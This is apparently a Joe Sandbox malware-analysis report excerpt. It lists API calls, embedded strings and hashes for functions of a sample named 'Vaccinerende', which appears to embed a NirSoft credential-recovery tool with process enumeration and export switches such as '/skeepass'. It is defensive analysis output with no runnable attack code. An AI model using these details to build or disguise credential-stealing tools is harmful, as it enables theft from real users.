                                            • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                            • String ID:
                                            • API String ID: 1010922700-0
                                            • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                            • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                            • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                            • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                            Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                            • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                            • malloc.MSVCRT ref: 004186B7
                                            • free.MSVCRT ref: 004186C7
                                            • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                            • free.MSVCRT ref: 004186E0
                                            • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                            • malloc.MSVCRT ref: 004186FE
                                            • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                            • free.MSVCRT ref: 00418716
                                            • free.MSVCRT ref: 0041872A
                                            • free.MSVCRT ref: 00418749
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: free$FullNamePath$malloc$Version
                                            • String ID: |A
                                            • API String ID: 3356672799-1717621600
                                            • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                            • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                            • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                            • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                            Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _wcsicmp
                                            • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                            • API String ID: 2081463915-1959339147
                                            • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                            • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                            • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                            • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                            Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                            • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                            • API String ID: 2012295524-70141382
                                            • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                            • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                            • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                            • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                            Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AddressProc$HandleModule
                                            • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                            • API String ID: 667068680-3953557276
                                            • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                            • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                            • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                            • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                            Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDC.USER32(00000000), ref: 004121FF
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                            • SetBkMode.GDI32(?,00000001), ref: 00412232
                                            • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                            • SelectObject.GDI32(?,?), ref: 00412251
                                            • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                            • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                              • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                              • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                              • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                            • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                            • SetCursor.USER32(00000000), ref: 004122BC
                                            • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                            • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                            • String ID:
                                            • API String ID: 1700100422-0
                                            • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                            • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                            • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                            • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                            Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetClientRect.USER32(?,?), ref: 004111E0
                                            • GetWindowRect.USER32(?,?), ref: 004111F6
                                            • GetWindowRect.USER32(?,?), ref: 0041120C
                                            • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                            • GetWindowRect.USER32(00000000), ref: 0041124D
                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                            • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                            • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                            • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                            • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                            • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                            • EndDeferWindowPos.USER32(?), ref: 0041130B
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Window$Defer$Rect$BeginClientItemPoints
                                            • String ID:
                                            • API String ID: 552707033-0
                                            • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                            • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                            • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                            • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                            Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                              • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                              • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                            • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                            • strchr.MSVCRT ref: 0040C140
                                            • strchr.MSVCRT ref: 0040C151
                                            • _strlwr.MSVCRT ref: 0040C15F
                                            • memset.MSVCRT ref: 0040C17A
                                            • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                            • String ID: 4$h
                                            • API String ID: 4066021378-1856150674
                                            • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                            • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                            • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                            • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                            Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$_snwprintf
                                            • String ID: %%0.%df
                                            • API String ID: 3473751417-763548558
                                            • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                            • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                            • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                            • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                            Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                            • KillTimer.USER32(?,00000041), ref: 004060D7
                                            • KillTimer.USER32(?,00000041), ref: 004060E8
                                            • GetTickCount.KERNEL32 ref: 0040610B
                                            • GetParent.USER32(?), ref: 00406136
                                            • SendMessageW.USER32(00000000), ref: 0040613D
                                            • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                            • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                            • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                            • String ID: A
                                            • API String ID: 2892645895-3554254475
                                            • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                            • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                            • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                            • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                            Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadMenuW.USER32(?,?), ref: 0040D97F
                                              • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                              • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                              • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                              • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                            • DestroyMenu.USER32(00000000), ref: 0040D99D
                                            • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                            • GetDesktopWindow.USER32 ref: 0040D9FD
                                            • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                            • memset.MSVCRT ref: 0040DA23
                                            • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                            • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                            • DestroyWindow.USER32(00000005), ref: 0040DA70
                                              • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                            • String ID: caption
                                            • API String ID: 973020956-4135340389
                                            • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                            • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                            • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                            • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                            Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                            • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                            • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                            • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$_snwprintf$wcscpy
                                            • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                            • API String ID: 1283228442-2366825230
                                            • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                            • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                            • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                            • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                            Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                            Download Yara Rule
                                            APIs
                                            • wcschr.MSVCRT ref: 00413972
                                            • wcscpy.MSVCRT ref: 00413982
                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                            • wcscpy.MSVCRT ref: 004139D1
                                            • wcscat.MSVCRT ref: 004139DC
                                            • memset.MSVCRT ref: 004139B8
                                              • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                              • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                            • memset.MSVCRT ref: 00413A00
                                            • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                            • wcscat.MSVCRT ref: 00413A27
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                            • String ID: \systemroot
                                            • API String ID: 4173585201-1821301763
                                            • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                            • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                            • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                            • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                            Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: wcscpy
                                            • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                            • API String ID: 1284135714-318151290
                                            • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                            • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                            • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                            • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                            Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                            • String ID: 0$6
                                            • API String ID: 4066108131-3849865405
                                            • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                            • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                            • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                            • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                            Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 004082EF
                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                            • memset.MSVCRT ref: 00408362
                                            • memset.MSVCRT ref: 00408377
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
